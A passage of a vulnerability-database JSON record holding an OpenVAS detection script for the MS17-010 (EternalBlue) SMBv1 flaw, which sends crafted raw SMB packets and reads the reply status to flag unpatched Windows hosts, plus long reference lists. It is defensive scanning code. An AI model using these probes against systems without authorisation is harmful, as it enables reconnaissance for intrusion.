0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x32, 0x00, 0x20, 0x00, 0x35, 0x00, 0x2e, 0x00,\n 0x31, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_andx_req );\n\n## SMB\tSession Setup AndX Response\nsmb_sess_andx_resp = smb_recv( socket:soc );\nif( ! smb_sess_andx_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n## SMB Tree Connect AndX Request, Path: \\\\xxx.xxx.xxx.xxx\\IPC$\nsmb_tree_resp = smb_tconx( soc:soc, name:name, uid:uid, share:\"IPC$\" );\nif(! smb_tree_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract Tree ID from SMB Tree Connect Response\nif(smb_tree_resp && strlen(smb_tree_resp) > 29)\n{\n tid_low = ord(smb_tree_resp[28] );\n tid_high = ord(smb_tree_resp[29] );\n}\nelse {\n exit(0);\n}\n\n# SMB Pipe PeekNamedPipe Request, FID: 0x0000\nsmbtrans_request = raw_string(0x00, 0x00, 0x00, 0x4a, 0xff, 0x53, 0x4d, 0x42,\n 0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x28,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00)+raw_string(tid_low, tid_high) +\n raw_string( 0xf5, 0x5e)+raw_string(uid_low, uid_high) +\n raw_string(0x26, 0x76, 0x10, 0x00, 0x00, 0x00,\n 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x4a, 0x00, 0x00, 0x00, 0x4a, 0x00, 0x02,\n 0x00, 0x23, 0x00, 0x00, 0x00, 0x07, 0x00, 0x5c,\n 0x50, 0x49, 0x50, 0x45, 0x5c, 0x00);\n\nsend( socket:soc, data: smbtrans_request);\nsmb_trans_resp = smb_recv( socket:soc );\nif(strlen( smb_trans_resp ) < 39)\n{\n close(soc);\n exit(0);\n}\n\n## SMB Trans Response, Error: STATUS_INSUFF_SERVER_RESOURCES\n## If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine\n## does not have the MS17-010 patch. After the patch, \"STATUS_ACCESS_DENIED\",\n## \"STATUS_INVALID_HANDLE\".\nif(ord(smb_trans_resp[9]) == 5 && ord(smb_trans_resp[10]) == 2 &&\n ord(smb_trans_resp[11]) == 0 && ord(smb_trans_resp[12]) == 192)\n{\n security_message(port:smbPort );\n close(soc);\n exit(0);\n}\nclose(soc);\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["cvss"], "edition": 6, "lastseen": "2019-05-06T14:30:35"}], "viewCount": 68, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96704", "SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177", "CPAI-2017-0198", "CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0419", "CPAI-2017-0200"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2020-06-08T23:26:33", "rev": 2}, "score": {"value": 8.2, "vector": "NONE", "modified": "2020-06-08T23:26:33", "rev": 2}}, "objectVersion": "1.5", "pluginID": "1361412562310810676", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810676\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0143\", \"CVE-2017-0144\", \"CVE-2017-0145\", \"CVE-2017-0146\",\n \"CVE-2017-0147\", \"CVE-2017-0148\");\n script_bugtraq_id(96703, 96704, 96705, 96707, 96709, 96706);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-22 17:51:25 +0530 (Wed, 22 Mar 2017)\");\n script_name(\"Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Bulletin MS17-010.\");\n\n script_tag(name:\"vuldetect\", value:\"Send the crafted SMB transaction request\n with fid = 0 and check the response to confirm the vulnerability.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the way that the\n Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain the ability to execute code on the target server, also\n could lead to information disclosure from the server.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 x32/x64\n\n - Microsoft Windows Server 2012\n\n - Microsoft Windows Server 2016\n\n - Microsoft Windows 8.1 x32/x64\n\n - Microsoft Windows Server 2012 R2\n\n - Microsoft Windows 7 x32/x64 Service Pack 1\n\n - Microsoft Windows Vista x32/x64 Service Pack 2\n\n - Microsoft Windows Server 2008 R2 x64 Service Pack 1\n\n - Microsoft Windows Server 2008 x32/x64 Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-in/kb/4013078\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n script_xref(name:\"URL\", value:\"https://github.com/rapid7/metasploit-framework/pull/8167/files\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_smb_version_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"smb_v1/supported\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\nname = kb_smb_name();\nsmbPort = kb_smb_transport();\n\nif(!name || !smbPort){\n exit(0);\n}\n\nsoc = open_sock_tcp( smbPort );\nif( ! soc ) exit( 0 );\n\n## SMB Negotiate Protocol Request\nsmb_neg_req = raw_string(0x00, 0x00, 0x00, 0x85, 0xff, 0x53, 0x4d, 0x42,\n 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x62, 0x00, 0x02,\n 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f,\n 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52,\n 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02,\n 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e,\n 0x30, 0x00, 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f,\n 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57,\n 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70,\n 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61, 0x00, 0x02,\n 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30,\n 0x32, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41,\n 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54,\n 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32,\n 0x00);\n\nsend( socket:soc, data:smb_neg_req );\n\n## SMB Negotiate Protocol Response\nsmb_neg_resp = smb_recv( socket:soc );\nif( ! smb_neg_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n## SMB Session Setup AndX Request, NTLMSSP_NEGOTIATE\nsmb_sess_req = raw_string(0x00, 0x00, 0x00, 0xec, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x42, 0x53, 0x52, 0x53, 0x50, 0x59,\n 0x4c, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x00, 0x40, 0x00, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x44, 0x01, 0x00, 0x01, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x4a, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xdc, 0x02, 0x00, 0x80, 0xb1, 0x00, 0x60,\n 0x48, 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05, 0x05,\n 0x02, 0xa0, 0x3e, 0x30, 0x3c, 0xa0, 0x0e, 0x30,\n 0x0c, 0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04, 0x01,\n 0x82, 0x37, 0x02, 0x02, 0x0a, 0xa2, 0x2a, 0x04,\n 0x28, 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50,\n 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x82, 0x08,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x05, 0x01, 0x28, 0x0a, 0x00, 0x00, 0x00,\n 0x0f, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x32, 0x00, 0x20, 0x00, 0x53, 0x00, 0x65, 0x00,\n 0x72, 0x00, 0x76, 0x00, 0x69, 0x00, 0x63, 0x00,\n 0x65, 0x00, 0x20, 0x00, 0x50, 0x00, 0x61, 0x00,\n 0x63, 0x00, 0x6b, 0x00, 0x20, 0x00, 0x32, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x36, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x00, 0x00, 0x57, 0x00, 0x69, 0x00,\n 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00,\n 0x73, 0x00, 0x20, 0x00, 0x32, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x32, 0x00, 0x20, 0x00, 0x35, 0x00,\n 0x2e, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_req );\n\n## SMB Session Setup AndX Response, NTLMSSP_CHALLENGE,\n## Error: STATUS_MORE_PROCESSING_REQUIRED\nsmb_sess_resp = smb_recv( socket:soc );\nif( ! smb_sess_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract UID from Session Setup AndX Response\nif(smb_sess_resp && strlen(smb_sess_resp) > 33)\n{\n uid_low = ord(smb_sess_resp[32]);\n uid_high = ord(smb_sess_resp[33]);\n uid = uid_high * 256;\n uid += uid_low;\n}\nelse {\n exit(0);\n}\n\n## SMB Session Setup AndX Request, NTLMSSP_AUTH, User: \\\nsmb_sess_andx_req = raw_string(0x00, 0x00, 0x01, 0x02, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x42, 0x53, 0x52, 0x53, 0x50, 0x59,\n 0x4c, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6)\n + raw_string(uid_low, uid_high) +\n raw_string( 0x80, 0x00, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x44, 0x01, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xdc, 0x02, 0x00, 0x80, 0xc7, 0x00, 0xa1,\n 0x5f, 0x30, 0x5d, 0xa2, 0x5b, 0x04, 0x59, 0x4e,\n 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03,\n 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x48,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x10, 0x00, 0x10, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x05, 0x02, 0x08, 0x00, 0x01,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x00,\n 0x77, 0x24, 0xb3, 0x5b, 0xd0, 0xee, 0x67, 0x99,\n 0xa6, 0x5b, 0x68, 0xa4, 0x4f, 0x0e, 0xeb, 0x56,\n 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00,\n 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x30, 0x00, 0x30, 0x00, 0x32, 0x00,\n 0x20, 0x00, 0x53, 0x00, 0x65, 0x00, 0x72, 0x00,\n 0x76, 0x00, 0x69, 0x00, 0x63, 0x00, 0x65, 0x00,\n 0x20, 0x00, 0x50, 0x00, 0x61, 0x00, 0x63, 0x00,\n 0x6b, 0x00, 0x20, 0x00, 0x32, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x36, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x32, 0x00, 0x20, 0x00, 0x35, 0x00, 0x2e, 0x00,\n 0x31, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_andx_req );\n\n## SMB Session Setup AndX Response\nsmb_sess_andx_resp = smb_recv( socket:soc );\nif( ! smb_sess_andx_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n## SMB Tree Connect AndX Request, Path: \\\\xxx.xxx.xxx.xxx\\IPC$\nsmb_tree_resp = smb_tconx( soc:soc, name:name, uid:uid, share:\"IPC$\" );\nif(! smb_tree_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract Tree ID from SMB Tree Connect Response\nif(smb_tree_resp && strlen(smb_tree_resp) > 29)\n{\n tid_low = ord(smb_tree_resp[28] );\n tid_high = ord(smb_tree_resp[29] );\n}\nelse {\n exit(0);\n}\n\n# SMB Pipe PeekNamedPipe Request, FID: 0x0000\nsmbtrans_request = raw_string(0x00, 0x00, 0x00, 0x4a, 0xff, 0x53, 0x4d, 0x42,\n 0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x28,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00)+raw_string(tid_low, tid_high) +\n raw_string( 0xf5, 0x5e)+raw_string(uid_low, uid_high) +\n raw_string(0x26, 0x76, 0x10, 0x00, 0x00, 0x00,\n 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x4a, 0x00, 0x00, 0x00, 0x4a, 0x00, 0x02,\n 0x00, 0x23, 0x00, 0x00, 0x00, 0x07, 0x00, 0x5c,\n 0x50, 0x49, 0x50, 0x45, 0x5c, 0x00);\n\nsend( socket:soc, data: smbtrans_request);\nsmb_trans_resp = smb_recv( socket:soc );\nif(strlen( smb_trans_resp ) < 39)\n{\n close(soc);\n exit(0);\n}\n\n## SMB Trans Response, Error: STATUS_INSUFF_SERVER_RESOURCES\n## If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine\n## does not have the MS17-010 patch. After the patch, \"STATUS_ACCESS_DENIED\",\n## \"STATUS_INVALID_HANDLE\".\nif(ord(smb_trans_resp[9]) == 5 && ord(smb_trans_resp[10]) == 2 &&\n ord(smb_trans_resp[11]) == 0 && ord(smb_trans_resp[12]) == 192)\n{\n security_message(port:smbPort );\n close(soc);\n exit(0);\n}\nclose(soc);\n", "naslFamily": "Windows : Microsoft Bulletins", "_object_type": "robots.models.openvas.OpenVASBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.openvas.OpenVASBulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "OPENVAS:1361412562310810810", "hash": "1063224037d1de9e658701a5b387a0d8", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)", "description": "This host is missing an critical security\n update according to Microsoft Bulletin MS17-010(WannaCrypt)", "published": "2017-03-15T00:00:00", "modified": "2020-06-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810810", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://support.microsoft.com/en-in/kb/4013078", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks", "http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598", "https://technet.microsoft.com/library/security/MS17-010"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2020-06-08T23:21:25", "history": [{"bulletin": {"id": "OPENVAS:1361412562310810810", "hash": "13dbacfea9ccc7b4170f350c89fe5df51259cc399304c94a2b7770a0daf674c4", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)", "description": "This host is missing an critical security\n update according to Microsoft Bulletin MS17-010(WannaCrypt)", "published": "2017-03-15T00:00:00", "modified": "2020-06-05T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810810", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://support.microsoft.com/en-in/kb/4013078", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks", "http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598", "https://technet.microsoft.com/library/security/MS17-010"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2020-06-05T17:22:59", "history": [], "viewCount": 2569, "enchantments": {"dependencies": {"modified": "2020-06-05T17:22:59", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/LOCAL/COMAHAWK", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": 